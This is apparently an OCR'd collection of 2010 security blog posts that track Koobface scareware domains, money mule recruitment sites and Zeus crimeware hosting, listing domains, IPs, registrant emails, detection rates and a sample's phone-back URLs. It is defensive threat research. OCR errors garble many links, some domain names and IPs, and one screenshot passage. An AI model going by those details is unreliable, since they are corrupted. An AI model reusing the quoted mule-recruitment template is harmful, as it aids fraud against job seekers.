12. http://ddanchev.blo as pot.com/2010/02/keepin a -mone v- 
mule-recruiters-on-short.html 


13. http://ddanchev.blo as pot.com/ 

14. http://twitter.com/danchodanchev 
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Koobface Redirectors and Scareware Campaigns Now 
Hosted in Moldova (2010-03-15 13:51) 

Just how greedy has the Koobface gang become these days? 
Very greedy. 

In fact, their currently active scareware campaigns operate 
with a changed directory structure that speaks for 

itself - scareware-domain/feel/index.php? 

GREED = = random _characters. Let's dissect the scareware 
monetization vector, expose the entire typosquatted 
domains portfolio, and offer a historical OSINT perspective on 
their activities during February, 2010. 


























• The domain portfolios are in a process of getting 
suspended 

The current portfolio of redirectors embedded on Koobface- 
infected hosts is parked at 195.5.161.129, AS43558, 

EVENTISMOBILE-AS IM "Eventis-Mobile" SRL Chisinau, 
Republic of Moldova: 

tvinyourpc.com - Email: test@now.net.cn 
wheretosellford.com - Email: test@now.net.cn 
weddings-sales-place.com - Email: test@now.net.cn 
chromepluginsfree.com - Email: test@now.net.cn 
checkwebtriple.com - Email: test@now.net.cn 
partypartytime.com - Email: test@now.net.cn 
yourblog2blog.com - Email: test@now.net.cn 
microstoreblog.com - Email: test@now.net.cn 
mexicomaxtravel.com - Email: info@montever.de 
fulllife2photo.com - Email: test@now.net.cn 
yourmaximumphoto.com - Email: test@now.net.cn 
lineagecheatandbug.com - Email: test@now.net.cn 
titansandgods.com - Email: test@now.net.cn 
microsoftbugtracks.com - Email: test@now.net.cn 
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secureyourinfos.com - Email: test@now.net.cn 
weddingiephotos.com - Email: test@now.net.cn 
parkeroffers.com - Email: test@now.net.cn 
nocderrors.com - Email: test@now.net.cn 

androidmobilereviews.com - Email: test@now.net.cn 
terraanews.com - Email: test@now.net.cn 
getbestshows.com - Email: test@now.net.cn 
videostvshows.com - Email: test@now.net.cn 
besttvshowininternet.com - Email: test@now.net.cn 
titanicoverlight.com - Email: test@now.net.cn 
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The scareware domains portfolio is currently parked on 
195.5.161.117, AS43558, EVENTISMOBILE-AS IM "Eventis- 

Mobile" SRL Chisinau, Republic of Moldova: 

be-protected-lO.info - Email: harkitrip@ymail.com 

be-protecteda.info - Email: harkitrip@ymail.com 

be-protectedc.info - Email: harkitrip@ymail.com 

be-protectedi.info - Email: harkitrip@ymail.com 

be-protected-i8.info - Email: harkitrip@ymail.com 


be-protectedk.info - Email: harkitrip@ymail.com 

be-protected-IO.info - Email: harkitrip@ymail.com 

be-protected-ll.info - Email: harkitrip@ymail.com 

be-protected-tl.info - Email: harkitrip@ymail.com 

be-protectedy.info - Email: harkitrip@ymail.com 

be-secured-al.info - Email: harkitrip@ymail.com 

be-secured-b2.info - Email: harkitrip@ymail.com 

be-secured-c6.info - Email: harkitrip@ymail.com 

be-secured-d9.info - Email: harkitrip@ymail.com 

be-secured-zl.info - Email: harkitrip@ymail.com 

capital-securityl.info - Email: goninanbiz2@ymail.com 

capital-security2.info - Email: goninanbiz2@ymail.com 

capital-security6.info - Email: goninanbiz2@ymail.com 

capital-securitya.info - Email: goninanbiz2@ymail.com 

capital-securityc.info - Email: goninanbiz2@ymail.com 

capital-securitye.info - Email: goninanbiz2@ymail.com 

capital-securityt.info - Email: goninanbiz2@ymail.com 

general-protectionO.info - Email: 
goninanbiz2@ymail.com 

general-protectionl.info - Email: 
goninanbiz2@ymail.com 
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general-protection4.info - Email: 
goninanbiz2@ymail.com 

general-protection9.info - Email: 
goninanbiz2@ymail.com 

how-to-secure-pcl.info - kramershoppers@yahoo.com 

help-you-nowO.info - Email: intrigo2@yahoo.com 

help-you-nowl.info - Email: intrigo2@yahoo.com 

help-you-now4.info - Email: intrigo2@yahoo.com 

help-you-now6.info - Email: intrigo2@yahoo.com 

help-you-now9.info - Email: intrigo2@yahoo.com 

• Consider going through M [l]The ultimate guide to 
scareware protection" and a [2]gallery of popular 
sea reware/fake security software brands 

pchelpserver.info - Email: vernotowersc2@googlemail.com 

pchelpservera.info - Email: 
vernotowersc2@googlemail.com 

pchelpserverz.info - Email: 
vernotowersc2@googlemail.com 

powersecurity09.info - Email: miscelli3@googlemail.com 
powersecurityc.info - Email: miscelli3@googlemail.com 
powersecurityt.info - Email: miscelN3@googlemail.com 


powersecurityy.info - Email: miscelli3@googlemail.com 
powerssoftwareO.info - Email: miscelli3@googlemail.com 
powerssoftwarel.info - Email: miscelli3@googlemail.com 
powerssoftware3.info - Email: miscelli3@googlemail.com 
powerssoftware6.info - Email: miscelli3@googlemail.com 
security-softwarec.info - kramershoppers@yahoo.com 
software-helpa.info - Email: hartin6@yahoo.com 
software-helpd.info - Email: hartin6@yahoo.com 
software-helpe.info - Email: hartin6@yahoo.com 
software-helpy.info - Email: hartin6@yahoo.com 
software-helpz.info - Email: hartin6@yahoo.com 
special-softwarel.info - Email: hartin6@yahoo.com 
special-software3.info - Email: hartin6@yahoo.com 
special-software7.info - Email: hartin6@yahoo.com 
special-software8.info - Email: hartin6@yahoo.com 
special-software9.info - Email: hartin6@yahoo.com 
specialwebhelpO.info - Email: hartin6@yahoo.com 
specialwebhelpl.info - Email: hartin6@yahoo.com 
specialwebhelp3.info - Email: hartin6@yahoo.com 
specialwebhelp5.info - Email: hartin6@yahoo.com 



specialwebhelp7.info - Email: hartin6@yahoo.com 
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Detection rates for scareware samples rotated over the past 
48 hours: 

- Setup _312s2.exe - [3]Trojan.Win32.FakeAV!IK - Result: 
4/41 (9.76 %) 

- Setup _312s2.exe - [4]Trojan.Generic.KD.3549 - Result: 
4/41 (9.76 %) 

- Setup _312s2.exe - [5]Trojan.Generic.KD.3605 - Result: 
10/42 (23.81 %) 

- Setup _312s2.exe - [6]Packed.Win32.Krap.as - Result: 
6/41 (14.64 %) 

- Setup _312s2.exe - [7]Trojan.Crypt.XPACK.Gen2 - Result: 
6/42 (14.29 %) 

- Setup _312s2.exe - [8]Sus/UnkPack-C - 10/42 (23.81 %) 

The samples phone back to projectwupdates.com/ 
download/winlogo.bmp - 94.228.208.57 and cari- 

port.com/ ?b=312s2 - 89.248.168.21 
(psdefendersoft.com and antispywarelist.com also 
parked there) - Email: zooik52@hotmail.com. 

• Consider going through the 11 [9]10 things you didn't 
know about the Koobface gang " article 

Recent detection rates for Koobface components: 

- [10jfb.l01.exe - Result: 39/42 (92.86 %) 



- [lljgo.exe - Result: 7/42 (16.67 %) 

- [12]pp.14.exe - Result: 36/42 (85.72 %) 

- [131v2bloggerjs.exe - Result: 39/42 (92.86 %) 

- [14Jv2captcha21.exe - Result: 24/41 (58.54 %) 

- [151v2newblogger.exe - Result: 23/41 (56.10 %) 

- [161v2googlecheck.exe - Result: 36/41 (87.80 %) 

- [17]v2webserver.exe - Result: 26/42 (61.91 %) 

In respect the Koobface gang, as well as cybecrime in 
general, historical OSINT always offers an invaluable 

piece of the malicious puzzle of their campaigns, hosting 
providers, and the campaign structure making it easier to 
establish multiple connections between the rest of their non 
Koobface-botnet related campaigns. 

Here's a peek at the redirectors and scareware domains 
served during February. For more extensive assess¬ 
ment of their activities for February, go through the "[18] A 

Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors 

Courtesy of the Koobface Gang" post. 
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Redirectors parked 91.212.132.242, AS49091, Interforum-AS 
Interforum LTD for February, 2010: 

amazing-4-fotos.com - Email: test@now.net.cn 


bbcadditionalguide.com - Email: test@now.net.cn 
brightonsales.com - Email: test@now.net.cn 
daily00photos.com - Email: test@now.net.cn 
daily6deals.com - Email: test@now.net.cn 
daily88news.com - Email: test@now.net.cn 
dellvideohacks.com - Email: test@now.net.cn 
discoverallnow.com - Email: test@now.net.cn 
discoverprivateinfo.com - Email: test@now.net.cn 
discoverprivatelife.com - Email: test@now.net.cn 
discoverprivatemail.com - Email: test@now.net.cn 
discoverprivatewebcams.com - Email: test@now.net.cn 
discoversecretdfacebook.com - Email: test@now.net.cn 
facebookfriendwatch.com - Email: test@now.net.cn 
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facebookreadmail.com - Email: test@now.net.cn 
free-amazon-coupon.com - Email: test@now.net.cn 
free-ebay-stuff.com - Email: test@now.net.cn 
free-secret-info.com - Email: test@now.net.cn 
getalestickets.com - Email: test@now.net.cn 
hightowerfisheye.com - Email: test@now.net.cn 



lenovovideohacks.com - Email: test@now.net.cn 

mymailbusiness.com - Email: test@now.net.cn 

private-O-photos.com - Email: test@now.net.cn 

seehiddenfacebook.com - Email: test@now.net.cn 

skyscrapeviews.com - Email: test@now.net.cn 

yahoobusinesstrip.com - Email: test@now.net.cn 

you22tube.com - Email: test@now.net.cn 

Scareware domains parked on 195.5.161.119, AS31252, 
STARNET-AS StarNet Moldova, for February, 2010: 

best-protectionO.info - Email: ware2mall@yahoo.com 

best-protection8.info - Email: ware2mall@yahoo.com 

bestprotectiona.info - Email: ware2mall@yahoo.com 

best-protectiona.info - Email: ware2mall@yahoo.com 

bestprotectione.info - Email: ware2mall@yahoo.com 

best-protectione.info - Email: ware2mall@yahoo.com 

best-protectionf.info - Email: ware2mall@yahoo.com 

megal-antivirus3.com - Email: test@now.net.cn 

megal-antivirus5.com - Email: test@now.net.cn 

megal-antivirus7.com - Email: test@now.net.cn 

megal-antivirus9.com - Email: test@now.net.cn 



megal-scanner5.com - Email: test@now.net.cn 

megal-scanner7.com - Email: test@now.net.cn 

smartsecurityO.info - Email: neeceheight@yahoo.com 

smartsecurityl.info - Email: neeceheight@yahoo.com 

smart-securityl.info - Email: neeceheight@yahoo.com 

smartsecurity2.info - Email: neeceheight@yahoo.com 

smartsecurity7.info - Email: neeceheight@yahoo.com 

smartsecuritya.info - Email: neeceheight@yahoo.com 

smartsecurityd.info - Email: neeceheight@yahoo.com 

smart-securityo.info - Email: neeceheight@yahoo.com 

super2-antivirus.com - Email: neeceheight@yahoo.com 

super2-antivirus2.com - Email: neeceheight@yahoo.com 

ver2-scanner.com - Email: test@now.net.cn 

ver2-scanner2.com - Email: test@now.net.cn 

ver2-scanner4.com - Email: test@now.net.cn 

Persistence must be met with persistence. The domain 
portfolios are in a process of getting suspended, an 

update will posted as soon as this happens. 

Related Koobface gang/botnet research: 

[19]10 things you didn't know about the Koobface gang 



[20] A Diverse Portfolio of Scareware/Blackhat SEO 
Redirectors Courtesy of the Koobface Gang 

[21] How the Koobface Gang Monetizes Mac OS X Traffic 

[22] The Koobface Gang Wishes the Industry "Happy 
Holidays" 
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[23] Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken 
Offline 

[24] Koobface Botnet Starts Serving Client-Side Exploits 

[25] Massive Scareware Serving Blackhat SEO, the Koobface 
Gang Style 

[26] Koobface Botnet's Scareware Business Model - Part Two 

[27] Koobface Botnet's Scareware Business Model - Part One 

[28] Koobface Botnet Redirects Facebook's IP Space to my 
Blog 

[29] New Koobface campaign spoofs Adobe's Flash updater 

[30] Social engineering tactics of the Koobface botnet 

[31] Koobface Botnet Dissected in a TrendMicro Report 

[32] Movement on the Koobface Front - Part Two 

[33] Movement on the Koobface Front 

[34] Koobface - Come Out, Come Out, Wherever You Are 

[35] Dissecting Koobface Worm's Twitter Campaign 



This post has been reproduced from [36]Dancho Danchev's 
blog. Follow him [37Jon Twitter. 

1. http://blo a s.zdnet.com/securit v/7 p=4297 

2. http://content.zdnet.com/2346-12691 22-342083.html 

3. 

http://www.virustotal.com/analisis/4e62aff9b6612090a088a 

bdlf31817a4582ed9e2ad81cd456f2e536d71fd0ad2-12684 

11269 

4. 

http://www.virustotal.com/analisis/0bd309172eacda58255cf 

35e6be6c2a9942056597el2el24d2df2cf27ca7dafd-12684 

36536 

5. 

http://www.virustotal.com/analisis/4681a237851bfcf0e785d 

3841a77b9c5fl86067dc0218edb96457552046d7a91- 

12684 

92213 

6 . 

http://www.virustotal.com/analisis/66a853d9ba6add77254ee 

ba4cad01c30d0e9f09778adbb978fdad84d27566f29-12685 

18041 


7 . 



















http://www.virustotal.com/analisis/f2bb5d8db53f005fb30f6d 

e99a!2a9a8aee9df871b7357a0flfd72f69abfe666-12685 

85736 

8 . 

http://www.virustotal.com/analisis/2021aeecdl66da3d87ecl 

7a403d7df89491dcac9d5b59295325d08fd52470dac-12685 

97879 

9. http://blo a s.zd net.com/secu rit v/? o = 5452 

10 . 

http://www.virustotal.com/analisis/51b56df5ed2c9815b855c 

220001ff8ell8ac0dddf4d47b377cf530156dca2b09-12684 

37394 

11 . 

http://www.virustotal.com/analisis/ef700b4cda22ba9fcl2076 

fdb3cdb3aaa6ed5734ac72a8c9bcd5220916b096f3-12684 

37400 

12 . 

http://www.virustotal.com/analisis/028af4fb82d77ba522799 

aba7e7d37df015a7ee99c6253a82bd4b5153b0d55a2-12684 

37402 

13. 

http://www.virustotal.com/analisis/0fe50ee612678361761b2 

26cf8def51c9101ddd80fbbaf567a782df7026bc464-12684 


37406 























14. 

http://www.virustotal.com/analisis/1123ef7613f92e64c61d0f 

beff2e93clbbdfb7a005cf967628daffc77bd06f5b-12684 

37471 

15. 

http://www.virustotal.com/analisis/af43db7c6alccl60fb6465 

9979a274fe205dd6cd2dac832ea4f08dcl8d5fc4b5-12684 

37483 

16. 

http://www.virustotal.com/analisis/187ee3a40da932718df09 

8blcaf4067b0d0ba81288ad5199453396baa735ae7Q-12684 

37474 

17. 

http://www.virustotal.com/analisis/1108276c9773c90d617a9 

66Q3981624160d8948e6992Q38eca7826f77Q0dc397- 

12684 

37594 

18. http://ddanchev.blo as pot.com/2010/Q2/diverse-portfolio- 
of-scarewareblackhat.html 

19. http://blo a s.zdnet.com/securit v/? p = 5452 

20. http://ddanchev.blo as pot.com/2010/02/diverse-portfollio- 
of-scarewareblackhat.html 
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21. http://ddanchev.blo as pot.com/2010/02/how-koobface- 
a an a -monetizes-mac-os-x.html 





























22. http://ddanchev.blo as pot.com/2009/12/koobface- a an a- 
wishes-mdustrv-ha pp v.html 


23. http://ddanchev.blo as pot.com/2009/12/koobface- 
friendlv-riccom-ltd-as29550.html 

24. http://ddanchev.blo as pot.com/2009/ll/koobface-botnet- 
starts-servin a -dient.html 

25. http://ddanchev.blo as pot.com/2009/ll/nnassive- 
scareware-servin a -blackhat-seo.html 

26. http://ddanchev.blo as pot.com/20Q9/ll/koobface- 
botnets-scareware-business.html 


27. http://ddanchev.blo as pot.com/2009/Q9/koobface- 
botnets-scareware-business.html 


28. http://ddanchev.blo as pot.com/20Q9/10/koobface-botnet- 
redirects-facebooks-ip.html 

29. http://blo a s.zdnet.com/securit v/? p=4594 

30. http://content.zdnet.com/2346-12691_22-352597.html 

31. http://ddanchev.blo as pot.com/20Q9/10/koobface-botnet- 
dissected-in-trendmicro.html 


32. http://ddanchev.blo as pot.com/2009/Q8/movement-on- 
koobface-front-part-two.html 

33. http://ddanchev.blo as pot.com/2009/Q8/movement-on- 
koobface-front.html 


34. http://ddanchev.blo as pot.com/2009/07/koobface-come- 
out-come-out-wherever-vou.html 















































35. http://ddanchev.blo as pot.com/2009/07/dissectin a- 
koobface-worms-twitter.html 


36. http://ddanchev.blo as oot.com/ 

37. http://twitter.com/danchodanchev 
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The Current State of the Crimeware Threat (2010-03- 
20 17:05) 

With [l]Zeus crimeware infections reaching epidemic levels, 

[2] two-factor authentication under fire, and the actual 

[3] DIY (do-it-yourself) kit becoming more sophisticated, it's 
time to reassess the situation by discussing the current and 
emerging crimeware trends. 

What's the current state of the crimeware threat? Just how 
vibrant is the underground marketplace when it 

comes to crimeware? What are ISPs doing, and should ISPs 
be doing to solve the problem? Does taking down a 

cybercrime-friendly ISP has any long term effects? 

I asked [4]Thorsten Holz, researcher at Vienna University of 
Technology, whose team not only participated in 

the recent [5]takedown of the Waledac botnet, but 
[6]released an interesting paper earlier this year, 
summarizing their findings based on 33GB of crimeware data 
obtained from active campaigns. 

• [7]The current state of the crimeware threat - Q &A 








Go through the Q &A. 

Related posts on crimeware kits, trends and 
developments: 

[8] Crimeware in the Middle - Zeus 

[9] Crimeware in the Middle - Limbo 

[10] Crimeware in the Middle - Adrenalin 

[11] 76Service - Cybercrime as a Service Going Mainstream 

[12] Zeus Crimeware as a Service Going Mainstream 

[13] Modified Zeus Crimeware Kit Comes With Built-in MP3 
Player 

[14] Zeus Crimeware Kit Gets a Carding Layout 

[15] The Zeus Crimeware Kit Vulnerable to Remotely 
Exploitable Flaw 
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[ 16]Help! Someone Hijacked my 100k-l- Zeus Botnet! 

[ 17]Inside a Zeus Crimeware Developer's To-Do List 

Zeus crimeware serving campaigns for Ql, 2010, 
related to TROYAK-AS: 

[18] TROYAK-AS: the cybercrime-friendly ISP that just won't 
go away 

[19] AS50215 Troyak-as Taken Offline, Zeus C &Cs Drop from 
249 to 181 



[20] Outlook Web Access Themed Spam Campaign Serves 
Zeus Crimeware 

[21] Pushdo Serving Crimeware, Client-Side Exploits and 
Russian Bride Scams 

[22] PhotoArchive Crimeware/Client-Side Exploits Serving 
Campaign in the Wild 

[23] Tax Report Themed Zeus/Client-Side Exploits Serving 
Campaign in the Wild 

[24] Keeping Money Mule Recruiters on a Short Leash - Part 
Two[25] 

This post has been reproduced from [26]Dancho Danchev's 
blog. Follow him [27Jon Twitter. 

1. http://blo a s.zdnet.com/securit v/? p = 5365 

2. http://blo a s.zdnet.com/securit v/? p=4402 

3. http://www.secureworks.com/research/threats/zeus/ 

4. http://honevblo a.org/ 

5. http://honevblo a .or a /archives/52-Waledac-Takedown- 
Successful.html 

6. http://honevblo a .or a /archives/48-Stud vina -Aspects-of-the- 
Under a round-Economv.html 

7. http://blo a s.zdnet.com/securit v/? p=5797 

8. http://ddanchev.blo as pot.com/2008/04/crimeware-in- 
middle-zeus.html 




























9. http://ddanchev.blo as pot.com/2009/03/crimeware-in- 
middle-limbo.html 


10. http://ddanchev.blo as pot.com/2009/Q2/crimeware-in- 
middle-adrenalin.html 


11. http://ddanchev.blo as pot.com/2008/08/76service- 
c vbercrime-as-service- a oin a .html 

12. http://ddanchev.blo as pot.com/20Q8/12/zeus-crimeware- 
as-service- a oin a .html 

13. http://ddanchev.blo as pot.com/2008/09/nnodified-zeus- 
crimeware-kit-comes-with.html 


14. http://ddanchev.blo as pot.com/20Q8/ll/zeus-crimeware- 
kit- g ets-cardin q -lavout.html 

15. http://ddanchev.blo as pot.com/2008/Q6/zeus-crimeware- 
kit-vulnerable-to.html 


16. http://ddanchev.blo as pot.com/2009/Q2/help-someone- 
hii acked-mv-100k-zeus.html 

17. http://ddanchev.blo as pot.com/2009/Q4/inside-zeus- 
crimeware-developers-to-do.html 

18. http://blo a s.zdnet.com/securit v/? p = 5761 

19. http://ddanchev.blo as pot.com/2010/03/as5Q215-trovak- 
as-taken-off1ine-zeus-c.html 


20. http://ddanchev.blo as pot.com/201Q/01/outlook-web- 
access-themed-spam-campai a n.html 


21. http://ddanchev.blo as pot.com/201Q/01/pushdo-servin a- 
crimeware-client-side.html 





















































22. http://ddanchev.blo as pot.com/2010/02/phQtoarchive- 
crimewareclient-side.html 


23. http://ddanchev.blo as pot.com/2010/02/tax-report- 
themed-zeusclient-side.html 


24. http://ddanchev.blo as pot.com/2010/02/keepin a -nnone v- 
mule-recruiters-on-short.html 


25. http://ddanchev.blo as pot.com/2010/02/tax-report- 
themed-zeusclient-side.html 


26. http://ddanchev.blo as oot.com/ 

27. http://twitter.com/danchodanchev 
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IT Programmers 

• Customer Servers 

• Cal Centers 
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• Payrel 

• Software Development 
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• Graptvcs & document conversions 
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Keeping Money Mule Recruiters on a Short Leash - 
Part Three (2010-03-20 23:14) 

UPDATED: 7 minutes after notification, EUROACCESS 
responded that the IPs mentioned within the AS " have been 
blackholed for the time being until a confirmation of cleanup 
has been received from the customer. 11 
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augrnent-group.com 

85.12.46.96 

augmentgroup.net 

85.12.46.96 

augment-groupmain. tw 

85.12.46.95 

amplitude-groupmain.net 

85.12.46.243 

asperitygroup.net 

85.12.46,95 

asperity-group.com 

85.12.46.95 

altitude-groupli.com 

85.12.46.95 

celeritygroupmain. tw 

85.12.46.95 

celerity-groupmain.net 

85.12.46.96 

celerity-groupmain.tw 

85.12.46.95 

impact-groupinc.net 

85.12.46.95 

impact-groupnet. com 

85.12.46.95 

excel-groupsvc.com 

85,12.46.95 

fecunda-group.com 

85.12.46.96 

fecunda-groupmain.net 

85.12.46.95 

f ecunda-groupmain. tw 

85.12.46.95 

foreaim-group.com 

85.12.46.95 

foreaimgroup.net 

85.12.46.96 

golden-gateinc.com 

85.12.46,95 

golden-gateco.net 

85.12.46.96 

luxor-groupco.tw 

85.12.46.96 

luxor-groupinc.tw 

85.12.46.96 

synapse-groupinc.tw 

85.12.46.95 

synapse-groupf ine. net 

85.12.46.96 

synapsegroupli.com 

85.12.46.96 

spark-groupsvc.com 

85.12.46.96 

tnmgroupsvc.net 

85.12.46.96 

tnmgroupinc.com 

85.12.46.95 

westendgroupsvc.net 

85.12.46.96 


It's a fact. However, in less than a minute the money mule 
recruitment gang moved the domains from the now 

blackholed 85.12.46.241; 85.12.46.242; 85.12.46.243 
85.12.46.244; 85.12.46.245 to 85.12.46.95 and 
85.12.46.96. 

These, including the crimeware and the scareware IPs, are 
now also blackholed. Let's see what the gang will 

do next. 

The cybercriminals you know, are better than the 
cybercriminals you don't know. They can be typosquatting, 

or changing their hosting providers, but they can't escape. 



The money mule recruiters profiled in M [l]Keeping Money 
Mule Recruiters on a Short Leash" and in "[2]Keeping Money 
Mule Recruiters on a Short Leash - Part Two" are now 
switching hosting to AS34305, EUROACCESS Global 
Autonomous System - the [3]Koobface gang was also 
using their services during the Christmas season. 

The gang appears to have also purchased new templates 
using new, but naturally, bogus descriptions of the 

money mule recruitment companies. It gets even more 
interesting, when one of the domains ([4]greatuk.org) 

participating in a Zeus crimeware campaign within 
AS34305, has been registered to hilarykneber@yahoo.com 

([5]The Kneber botnet - FAQ). 

An excerpt from [6]The Kneber botnet - FAQ on the 

Koobface gang connection: 

• The name servers used in [7]December, 2009's DocStoc 
scareware campaign, were registered using the same 
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email used to register the [8]client-side exploit serving 
domains part of the Koobface gang's experiment conducted 
in November, 2009. Parked on the same IP hosting the 
domain which was serving the malware in the 

campaign, was also the a domain registered to 
HilaryKneber@yahoo.com (search-results .cn) Even more 
inter¬ 
esting is the fact that the emails used to registered the rest 
of the domains parked at this IP, are also known 



to have been used in registering money mule recruitment 
domains ([9]Standardizing the Money Mule Recruit¬ 
ment Process; [10]Keeping Money Mule Recruiters on 
a Short Leash) 

The bogus money mule recruitment companies are 
using identical templates, describing themselves as 
follows: 

11 Welcome to the world of Outsourcing. Never has a 
phenomenon been so all encompassing and empowering like 
outsourcing. Transcending beyond an industry's vertical 
segments, outsourcing has become the "by default" strategy 
for all profit conscious organizations that struggle to retain 
their winning streak and high profitability. Today's scenario in 
the business world is more competitive than what it was in 
the past. 

There is a growing realization that wisdom lies in 
consolidating the core competency functions and outsourc¬ 
ing the supplement. We are an online services marketplace 
in USA and Australia. Our goal is to empower businesses with 
the absolute freedom to choose where to outsource their 
business needs to maximize their competitive advantage. 

We believe that "money saved due to outsourcing can be 
effectively and successfully utilized to focus more on 
strategic and core businesses functions". 

Let's expose the domains portfolio, its supporting name 
servers, and emphasize on the scareware and crime- 

ware activity currently taking place at AS34305, 
EUROACCESS Global Autonomous System. 
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Active money mule recruitment domains: 

augment-group.com - 85.12.46.245 - Email: 
mylar@5mx.ru 

augmentgroup.net - 85.12.46.245 - Email: 
glean@fastermail.ru 

augment-groupmain.tw - 85.12.46.245 - Email: 
gutsy@qx8.ru 

amplitude-groupmain.net - 85.12.46.245 - Email: 
tabs@5mx.ru 






asperitygroup.net - 85.12.46.241 - Email: 
cde@freenetbox.ru 

asperity-group.com - 85.12.46.244 - Email: okay@qx8.ru 

alwyn-groupllc.com - Email: cde@freenetbox.ru 

altitude-groupli.com - 85.12.46.244 - Email: 
mylar@5mx.ru 

celeritygroupmain.tw - 85.12.46.242 - Email: 
gutsy@qx8.ru 

celerity-groupmain.net - 85.12.46.243 - 
cde@freenetbox.ru 

celerity-groupmain.tw - 85.12.46.241 - Email: 
weds@fastermail.ru 

impact-groupinc.net - 85.12.46.242 - Email: 
cde@freenetbox.ru 

impact-groupnet.com - 85.12.46.243 - Email: 
okay@qx8.ru 

excel-groupsvc.com - 85.12.46.241 - Email: carlo@qx8.ru 
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Augment Group I 



How site works? 

1 Post and track your vacancies. RFPs and projects 
2. Find affordable freelancers or full-time staff 
3 Get work done below budget and make profit 



About the Company 
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fecunda-group.com - 85.12.46.241 - Email: okay@qx8.ru 

fecunda-groupmain.net - 85.12.46.243 - Email: 
mylar@5mx.ru 

fecunda-groupmain.tw - 85.12.46.245 - Email: 
ti@fastermail.ru 


foreaim-group.com - 85.12.46.245 - Email: 
cde@freenetbox.ru 


foreaimgroup.net - 85.12.46.241 - Email: 
glean@fastermail.ru 









golden-gateinc.com - 85.12.46.242 - Email: 
cde@freenetbox.ru 

golden-gateco.net - 85.12.46.242 - Email: carlo@qx8.ru 
luxor-groupco.tw - 85.12.46.244 - Email: logic@qx8.ru 
luxor-groupinc.tw - 85.12.46.244 - Email: gv@fastermail.ru 
synapse-groupinc.tw - 85.12.46.241 - Email: omega@ 
fastermail.ru 

synapse-groupfine.net - 85.12.46.245 - Email: 
okay@qx8.ru 

synapsegroupli.com - 85.12.46.243 - Email: tabs@5mx.ru 

spark-groupsvc.com - Email: trim@freenetbox.ru 

tnmgroupsvc.net - 85.12.46.245 - Email: tabs@5mx.ru 

tnmgroupinc.com - 85.12.46.241 - Email: tabs@5mx.ru 

westendgroupsvc.net - 85.12.46.241 - Email: 
mylar@5mx.ru 
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5 Impact Group Inc 


How site works? 

1. Post and track your vacancies, RF 
3. Get work done below budget and make profit 



What We Do 


Services Overview 


About us 


Ahoul the Company 

e world oiOutsourc mg never has a pnenomenoo oeen so at eiKompassng 
tng Trarocendng beyond an industry's vert*af segments 
p Dy oti*jr strategy for ai prof! conscious organoaticnrs trial 

struggle to retan ITteir « 

■erw «s more compestve man anal * «as n *ve past There is a growmg reattaticn mat 

We are an ontne services mar*e<ptace m USA and Ausvata Our goal is to empower 




Latest projects 


e mat "money saved due to o 


maEipefl 

S&WtTMUJS part a 


Our service 


Ptp Mamet wee*** 


Name servers: 

nsl.maninwhite.ee - 89.248.166.45 - Email: 
duly@fastermail.ru 

nsl.trythisok.cn - 89.248.166.45 - Email: chunk@qx8.ru 

nsl.translatasheep.net - 92.63.111.127 - Email: 
stair@freenetbox.ru 

nsl.alwaysexit.com - 92.63.111.146 - Email: 
sob@bigmailbox.ru 

nsl.ehinegrowth.ee - 89.248.166.59 - Email: 
duly@fastermail.ru 




ns2.cnnandpizza.cc - 205.234.195.188 - Email: 
bears@fastermail.ru 

nsl.benjenkinss.cn - 89.248.166.59 - Email: 
chunk@qx8.ru 

nsl.worldslava.ee - 64.85.174.145 - Email: 
fussy@bigmailbox.ru 

ns2.uleaveit.com - 204.12.217.253 - Email: plea@qx8.ru 

ns3.pesenlife.net - 74.118.194.86 - Email: erupt@qx8.ru 

nsl.basilkey.ws - 98.158.171.87 

Next to the money mule recruitment domains, there are 
several [ll]active Zeus crimeware active campaigns, 

using the following domains/IPs. In fact one of them is using 
a domain registered to Hilary Kneber ([12]The Kneber 
botnet - FAQ): 

[13] greatuk.org - 193.104.22.100 - Email: 
hilarykneber@yahoo.com 

[14] greatan.cn - 193.104.22.100 - Email: AlehnoLopu 
_@yahoo.com 

[15] 193.104.22.71 

[16] 193.104.22.90 
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What are we missing? 

Naturally, that's the scareware monetization element. 



Let's expose one of the cur¬ 
rently active scareware domain portfolios there. 

Domains responding to 193.104.22.50 - AS34305, 
EUROACCESS Global Autonomous System: 

2009antispyware.net - Email: admin@web- 
antispyware.com 

againstspyware.com - Email: admin@antiviruscenter.net 

antispycenterprof.com - Email: 
admin@antispycenterprof.com 

anti-spyware-2010.net - Email: 
admin@antiviruscenter.net 

antispyware24x7.com - Email: 
admin@antispyware24x7.com 

antispywareglobal.com - Email: 
admin@antiviruscenter.net 

antispywareonline.net - Email: admin@antiviruscenter.net 

antispywaresnet.com - Email: 
admin@antispywaresnet.com 

antispywarets.com - Email: admin@antispywarets.com 

antispywareweb.net - Email: admin@antiviruscenter.net 

antispyworidwideint.com - Email: 
admin@antispyworldwideint.com 

antiviruscenter.net - Email: admin@antiviruscenter.net 



antivirusexpert.net - Email: admin@antiviruscenter.net 

antivirus-live.net - Email: admin@antiviruscenter.net 

antiviruslivepro.com - Email: admin@antiviruscenter.net 

antiviruslive-pro.com - Email: admin@antiviruscenter.net 

antivirus-service.net - Email: admin@antiviruscenter.net 

antivirustop.net - Email: admin@antiviruscenter.net 

bestantispysoft2010.com - Email: 
admin@bestantispysoft2010.com 
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eliminater2009pro.com - Email: 
admin@eliminater2009pro.com 

itsafetyonline.com - Email: admin@itsafetyonline.com 

ivirusidentify.com - Email: admin@ivirusidentify.com 

myprivatesoft2009.com - Email: 
admin@myprivatesoft2009.com 




netantivirus.net - Email: admin@antiviruscenter.net 

onlineantispysoft.com - Email: 
admin@onlineantispysoft.com 

pcdoctorz2010.com - Email: admin@pcdoctorz2010.com 

pcprotect2010.com - Email: admin@pcprotect2010.com 

pcsafety2009pro.com - Email: 
admin@pcsafety2009pro.com 

protection2010.com - Email: 
admin@pcsafety2009pro.com 

protectorservice.com - Email: admin@antiviruscenter.net 
superantivirus.net - Email: admin@antiviruscenter.net 
systemprotector.net - Email: admin@antiviruscenter.net 
total-defender.com - Email: admin@total-defender.com 
virusdetect24.com - Email: admin@antiviruscenter.net 
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virusremoveonline.com - Email: 
admin@antiviruscenter.net 

worldantispywarel.com - Email: 
admin@worldantispywarel.com 

worldprotection.net - Email: admin@antiviruscenter.net 

EUROACCESS has been notified, the post will be updated 
once/if they take care of the "customers" violating their 
Terms of Service. 



Related coverage of money laundering in the context 
of cybercrime: 

[17] Money Mule Recruiters on Yahool's Web Hosting 

[18] Dissecting an Ongoing Money Mule Recruitment 
Campaign 

